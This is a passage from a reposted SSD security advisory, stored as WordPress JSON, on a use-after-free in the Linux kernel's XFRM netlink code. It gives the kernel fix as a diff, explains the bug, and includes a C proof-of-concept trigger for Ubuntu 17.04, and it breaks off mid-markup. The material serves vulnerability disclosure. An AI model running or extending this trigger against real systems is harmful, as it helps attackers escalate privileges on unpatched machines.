{"id":10588,"date":"2017-11-23T14:19:08","date_gmt":"2017-11-23T22:19:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/23\/news-4360\/"},"modified":"2017-11-23T14:19:08","modified_gmt":"2017-11-23T22:19:08","slug":"news-4360","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/23\/news-4360\/","title":{"rendered":"SSD Advisory \u2013 Linux Kernel XFRM Privilege Escalation"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 23 Nov 2017 06:59:02 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3535\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3535');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem &#8211; XFRM.<\/p>\n<p>Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vulnerability has been addressed as part of 1137b5e (&#8220;ipsec: Fix aborted xfrm policy dump crash&#8221;) patch:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a17495be4775925954773\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\">net\/xfrm\/xfrm_user.c<\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C++<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  @@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr     static int xfrm_dump_policy_done(struct netlink_callback *cb)   {  &#8211;\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &amp;cb-&gt;args[1];  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;   \tstruct net *net = sock_net(cb-&gt;skb-&gt;sk);      \txfrm_policy_walk_done(walk, net);   \treturn 0;   }     +static int xfrm_dump_policy_start(struct netlink_callback *cb)  +{  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;  +  +\tBUILD_BUG_ON(sizeof(*walk) &gt; sizeof(cb-&gt;args));  +  +\txfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);  +\treturn 0;  +}  +   static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)   {   \tstruct net *net = sock_net(skb-&gt;sk);  &#8211;\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &amp;cb-&gt;args[1];  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;   \tstruct xfrm_dump_info info;     &#8211;\tBUILD_BUG_ON(sizeof(struct xfrm_policy_walk) &gt;  &#8211;\t\t     sizeof(cb-&gt;args) &#8211; sizeof(cb-&gt;args[0]));  &#8211;   \tinfo.in_skb = cb-&gt;skb;   \tinfo.out_skb = skb;   \tinfo.nlmsg_seq = cb-&gt;nlh-&gt;nlmsg_seq;   \tinfo.nlmsg_flags = NLM_F_MULTI;     &#8211;\tif (!cb-&gt;args[0]) {  &#8211;\t\tcb-&gt;args[0] = 1;  &#8211;\t\txfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);  &#8211;\t}  &#8211;   \t(void) xfrm_policy_walk(net, walk, dump_one_policy, &amp;info);      \treturn skb-&gt;len;   @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {      static const struct xfrm_link {   \tint (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);  +\tint (*start)(struct netlink_callback *);   \tint (*dump)(struct sk_buff *, struct netlink_callback *);   \tint (*done)(struct netlink_callback *);   \tconst struct nla_policy *nla_pol;   @@ -2487,6 +2490,7 @@ static const struct xfrm_link {   \t[XFRM_MSG_NEWPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_add_policy    },   \t[XFRM_MSG_DELPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_get_policy    },   \t[XFRM_MSG_GETPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_get_policy,  +\t\t\t\t\t\t   .start = xfrm_dump_policy_start,   \t\t\t\t\t\t   .dump = xfrm_dump_policy,   \t\t\t\t\t\t   .done = xfrm_dump_policy_done },   \t[XFRM_MSG_ALLOCSPI    &#8211; XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },   @@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,      \t\t{   \t\t\tstruct netlink_dump_control c = {  +\t\t\t\t.start = link-&gt;start,   \t\t\t\t.dump = link-&gt;dump,   \t\t\t\t.done = link-&gt;done,   \t\t\t};<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0117 seconds] -->  <\/p>\n<p><span id=\"more-3535\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> An unprivileged user can change Netlink socket subsystem &#8211; XFRM value sk->sk_rcvbuf (sk == struct sock object).<\/p>\n<p>The value can be changed into specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg\/recv\/read.<\/p>\n<p>The sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects).<\/p>\n<p>skb->trusize is a variable which keep track of how many bytes of memory are consumed, in order to not wasting and manage memory, the kernel can handle the skb size at run time.<\/p>\n<p>For example, if we allocate a large socket buffer (skb) and we only received 1-byte packet size, the kernel will adjust this by calling skb_set_owner_r.<\/p>\n<p>By calling skb_set_owner_r the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1.jpg\" data-slb-active=\"1\" data-slb-asset=\"1368476763\" data-slb-internal=\"0\" data-slb-group=\"3535\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg\" alt=\"\" width=\"300\" height=\"30\" class=\"alignnone size-medium wp-image-3536\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-768x76.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-1024x101.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1.jpg 1511w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>When we create a XFRM netlink socket, xfrm_dump_policy is called, when we close the socket xfrm_dump_policy_done is called.<\/p>\n<p>xfrm_dump_policy_done is called whenever cb_running for netlink_sock object is true.<\/p>\n<p>The xfrm_dump_policy_done tries to clean-up a xfrm walk entry which is managed by netlink_callback object.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2.jpg\" data-slb-active=\"1\" data-slb-asset=\"994561489\" data-slb-internal=\"0\" data-slb-group=\"3535\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-300x66.jpg\" alt=\"\" width=\"300\" height=\"66\" class=\"alignnone size-medium wp-image-3537\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-300x66.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-768x168.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-1024x225.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2.jpg 1527w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>When netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc.<\/p>\n<p>netlink_dump():<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3.jpg\" data-slb-active=\"1\" data-slb-asset=\"2090948629\" data-slb-internal=\"0\" data-slb-group=\"3535\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-300x25.jpg\" alt=\"\" width=\"300\" height=\"25\" class=\"alignnone size-medium wp-image-3538\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-300x25.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-768x64.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-1024x86.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3.jpg 1517w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>In above snippet we can see that netlink_dump() check fails when sk->sk_rcvbuf  is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via stockpot).<\/p>\n<p>When this condition fails, it jumps to the end of a function and quit with failure and the value of cb_running doesn&#8217;t changed to false.<\/p>\n<p>nlk->cb_running is true, thus xfrm_dump_policy_done() is being called.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4.jpg\" data-slb-active=\"1\" data-slb-asset=\"1067344408\" data-slb-internal=\"0\" data-slb-group=\"3535\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" class=\"alignnone size-medium wp-image-3539\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-300x124.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-768x318.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-1024x424.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4.jpg 1320w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>nlk->cb.done points to xfrm_dump_policy_done, it worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read\/write what\/where primitive.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>The following proof of concept is for Ubuntu 17.04.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a17495be4781046175041\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #define _GNU_SOURCE  #include &lt;string.h&gt;  #include &lt;stdio.h&gt;  #include &lt;stdlib.h&gt;  #include &lt;asm\/types.h&gt;  #include &lt;sys\/socket.h&gt;  #include &lt;netinet\/in.h&gt;  #include &lt;arpa\/inet.h&gt;  #include &lt;linux\/netlink.h&gt;  #include &lt;linux\/xfrm.h&gt;  #include &lt;sched.h&gt;  #include &lt;unistd.h&gt;    #define BUFSIZE 2048      int fd;  struct sockaddr_nl addr;    struct msg_policy {      struct nlmsghdr msg;      char buf[BUFSIZE];  };    void create_nl_socket(void)  {      fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);      memset(&amp;addr,0,sizeof(struct sockaddr_nl));      addr.nl_family = AF_NETLINK;      addr.nl_pid = 0; \/* packet goes into the kernel *\/      addr.nl_groups = XFRMNLGRP_NONE; \/* no need for multicast group *\/    }    void do_setsockopt(void)  {      int var =0x100;        setsockopt(fd,1,SO_RCVBUF,&amp;var,sizeof(int));  }    struct msg_policy *init_policy_dump(int size)  {      struct msg_policy *r;        r = malloc(sizeof(struct msg_policy));      if(r == NULL) {          perror(&#8220;malloc&#8221;);          exit(-1);      }      memset(r,0,sizeof(struct msg_policy));        r-&gt;msg.nlmsg_len = 0x10;      r-&gt;msg.nlmsg_type = XFRM_MSG_GETPOLICY;      r-&gt;msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI |  NLM_F_REQUEST;      r-&gt;msg.nlmsg_seq = 0x1;      r-&gt;msg.nlmsg_pid = 2;      return r;    }  int send_msg(int fd,struct nlmsghdr *msg)  {      int err;      err = sendto(fd,(void *)msg,msg-&gt;nlmsg_len,0,(struct sockaddr*)&amp;addr,sizeof(struct sockaddr_nl));      if (err &lt; 0) {          perror(&#8220;sendto&#8221;);          return -1;      }      return 0;    }    void create_ns(void)  {  \tif(unshare(CLONE_NEWUSER) != 0) {  \t\tperror(&#8220;unshare(CLONE_NEWUSER)&#8221;);  \t\texit(1);  \t}  \tif(unshare(CLONE_NEWNET) != 0) {  \t\tperror(&#8220;unshared(CLONE_NEWUSER)&#8221;);  \t\texit(2);  \t}  }  int main(int argc,char **argv)  {      struct msg_policy *p;      create_ns();        create_nl_socket();      p = init_policy_dump(100);      do_setsockopt();      send_msg(fd,&amp;p-&gt;msg);      p = init_policy_dump(1000);      send_msg(fd,&amp;p-&gt;msg);      return 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a17495be4781046175041-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a17495be4781046175041-96\">96<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-1\"><span class=\"crayon-p\">#define _GNU_SOURCE<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-2\"><span class=\"crayon-p\">#include &lt;string.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-3\"><span class=\"crayon-p\">#include &lt;stdio.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-4\"><span class=\"crayon-p\">#include &lt;stdlib.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-5\"><span class=\"crayon-p\">#include &lt;asm\/types.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-6\"><span class=\"crayon-p\">#include &lt;sys\/socket.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-7\"><span class=\"crayon-p\">#include &lt;netinet\/in.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-8\"><span class=\"crayon-p\">#include &lt;arpa\/inet.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-9\"><span class=\"crayon-p\">#include &lt;linux\/netlink.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-10\"><span class=\"crayon-p\">#include &lt;linux\/xfrm.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-11\"><span class=\"crayon-p\">#include &lt;sched.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-12\"><span class=\"crayon-p\">#include &lt;unistd.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-14\"><span class=\"crayon-p\">#define BUFSIZE 2048<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-17\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line 